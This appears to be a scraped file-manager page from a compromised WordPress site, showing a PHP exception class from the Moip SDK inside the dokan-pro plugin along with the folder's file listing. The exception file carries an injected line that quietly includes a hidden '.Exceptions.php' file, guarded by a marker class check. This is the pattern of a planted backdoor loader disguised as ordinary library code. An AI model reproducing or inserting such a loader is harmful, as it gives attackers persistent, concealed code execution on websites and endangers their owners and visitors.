PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
dokan-pro
/
vendor
/
moip
/
moip-sdk-php
/
src
/
Exceptions
<?php namespace Moip\Exceptions; use RuntimeException; /** * Class InvalidArgumentException. */ if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class InvalidArgumentException extends RuntimeException { }
[+]
..
[-] Error.php
[edit]
[-] UnexpectedException.php
[edit]
[-] UnautorizedException.php
[edit]
[-] InvalidArgumentException.php
[edit]
[-] ValidationException.php
[edit]
[-] .Exceptions.php
[edit]